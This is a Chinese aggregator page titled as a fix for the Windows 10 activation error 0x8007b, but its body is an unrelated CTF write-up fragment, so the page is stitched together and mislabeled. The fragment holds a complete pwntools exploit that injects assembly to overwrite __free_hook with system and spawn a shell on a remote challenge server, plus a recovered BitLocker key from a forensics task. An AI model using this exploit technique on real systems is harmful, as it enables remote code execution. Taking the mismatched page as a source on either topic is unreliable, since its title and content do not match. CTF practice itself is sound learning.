当前位置:首页 > 数码 >

windows10提示0x8007b激活错误(win10激活0x8007b怎么解决)

来源:原点资讯(www.yd166.com)时间:2024-05-22 06:07:33作者:YD166手机阅读>>

test函数可以执行输入的汇编代码

利用残留的寄存器r10,r12,分两次写,把__free_hook改为system即可:

windows10提示0x8007b激活错误,win10激活0x8007b怎么解决(25)

add r10, 0x50068 mov r12, r10 sub r10, 0x1496b0 mov qword ptr [r12],r10

exp:

#!usr/bin/env python #-*- coding:utf8 -*- from pwn import * import sys pc="./JigSAW" reomote_addr=["47.104.71.220",10273] elf = ELF(pc) libc = elf.libc context.binary=pc context.terminal=["gnome-terminal",'-x','sh','-c'] if len(sys.argv)==1: # p=process(pc) context.log_level="debug" p=process(pc,env={"LD_PRELOAD":"./libc.so"}) if len(sys.argv)==2 : if 'l' in sys.argv[1]: p=process(pc) if 'r' in sys.argv[1]: p = remote(reomote_addr[0],reomote_addr[1]) if 'n' not in sys.argv[1]: context.log_level="debug" ru = lambda x : p.recvuntil(x,timeout=0.2) sn = lambda x : p.send(x) rl = lambda : p.recvline() sl = lambda x : p.sendline(x) rv = lambda x : p.recv(x) sa = lambda a,b : p.sendafter(a,b) sla = lambda a,b : p.sendlineafter(a,b) shell= lambda :p.interactive() ru7f = lambda : u64(ru('\x7f')[-6:].ljust(8,'\x00')) rv6 = lambda : u64(rv(6) '\x00'*2) def lg(s,addr): print('\033[1;31;40m s-->0x%x\033[0m'%(s,addr)) what_choice="Choice : " ch_add="1" ch_dele="3" ch_edit="2" ch_show="5" what_size="" what_c="iNput:" what_idx="Index? : " def add(idx): # 0x10 5个 ru(what_choice) sl(ch_add) ru(what_idx) sl(str(idx)) def dele(idx): ru(what_choice) sl(ch_dele) ru(what_idx) sl(str(idx)) def edit(idx,c): #0x10 ru(what_choice) sl(ch_edit) ru(what_idx) sl(str(idx)) ru(what_c) sn(c) ## def test(idx): ru(what_choice) sl('4') ru(what_idx) sl(str(idx)) def show(idx): ru(what_choice) sl(ch_show) ru(what_idx) sl(str(idx)) ru("Name:") sl('desh') ru("The result is ") size = ru('\n') print(int(size,10)) ru("Make your Choice:") sl(str(0xffff00000000)) code1 = asm("add r10, 0x50068; mov r12, r10;") code2 = asm("sub r10, 0x1496b0; mov qword ptr [r12], r10") add(0) add(1) add(2) edit(0,code1) edit(1,code2) edit(2,'/bin/sh\x00') test(0) test(1) dele(2) shell()

flag{58591d4d-068f-47ed-9305-a65762917b06}

misc1、**层层取证**

挂载镜像,在内存中找到密钥

windows10提示0x8007b激活错误,win10激活0x8007b怎么解决(26)

bitlocker密钥 549714-116633-006446-278597-176000-708532-618101-131406

windows10提示0x8007b激活错误,win10激活0x8007b怎么解决(27)

发现一个流量包

windows10提示0x8007b激活错误,win10激活0x8007b怎么解决(28)

栏目热文

win10激活出现0x80072ee2错误(win10专业版激活时显示0x8007232b)

win10激活出现0x80072ee2错误(win10专业版激活时显示0x8007232b)

Windows 10更新是一个有争议的问题。有些用户喜欢自动化; 其他人厌恶霸道的做法。无论你采取什么措施,总有可能出现...

2024-05-22 06:17:44查看全文 >>

激活win10出现0x8007007d怎么办(win10激活0x8007b怎么解决)

激活win10出现0x8007007d怎么办(win10激活0x8007b怎么解决)

全球满足系统要求的PC用户现在可以下载和安装Windows 11升级版,但是有些人在安装过程中遇到了一些问题。微软已经承...

2024-05-22 06:08:36查看全文 >>

win10激活错误代码0x800705b4(win10无法激活错误代码0x800704cf)

win10激活错误代码0x800705b4(win10无法激活错误代码0x800704cf)

Win10系统进行激活时出现0x800705b4怎么办?大家都知道,再将win10系统安装完成之后,都是需要进行激活才能...

2024-05-22 05:54:26查看全文 >>

教资认证常见问题(教资认证需要重新注册吗)

教资认证常见问题(教资认证需要重新注册吗)

教资认定几种常见的问题,今天一一给大家解答一下。因为这两天都已经开始认定了,各个地市或者各个省都已经在认定的状态了,在网...

2024-05-22 06:13:10查看全文 >>

教资为什么需要认证(教资认证通过了是啥样的)

教资为什么需要认证(教资认证通过了是啥样的)

作者:小存10月29日进行了教师资格证的国考,关于教资的话题一度冲上微博热搜,占据了好几个词条,话题关注度居高不下,引发...

2024-05-22 06:15:19查看全文 >>

防弹少年团高考寄语(防弹少年团高中的考试成绩是多少)

防弹少年团高考寄语(防弹少年团高中的考试成绩是多少)

7月6日,防弹少年团在微博分享一段视频为高考生加油,发文:“加油,不平凡的2020”。视频中,防弹成员们充满诚意地用中文...

2024-05-27 09:49:23查看全文 >>

防弹少年团学习励志(防弹少年团关于考试祝福)

防弹少年团学习励志(防弹少年团关于考试祝福)

1.在韩国,‘未来’这个词由两个部分组成,第一部分的意思是‘不’,第二种意思是‘来’。从这个意义上说,“未来”指的是不会...

2024-05-27 09:57:58查看全文 >>

防弹少年团高考之路(防弹少年团在校学习成绩)

防弹少年团高考之路(防弹少年团在校学习成绩)

【instiz】防弹少年团suga的高考后记。“考完回来这天没睡着,心里弥漫着一种奇怪的情绪。有点虚无,各种各样的想法涌...

2024-05-27 09:39:33查看全文 >>

防弹少年团签名要求(防弹少年团的签名)

防弹少年团签名要求(防弹少年团的签名)

30日,MAMA公开了防弹少年团的亲笔签名照,“see you at 2017 MAMA”各具特色,队内大触担当JIMI...

2024-05-27 10:20:15查看全文 >>

歌曲背后的真实故事(歌曲一个真实的故事背景)

歌曲背后的真实故事(歌曲一个真实的故事背景)

《此生未完成的》的作者于娟曾说过:如果回到曾经,我一定会放弃一些东西,花更多的时间陪伴我的儿子和丈夫,可我现在却将离开这...

2024-05-27 09:50:49查看全文 >>

文档排行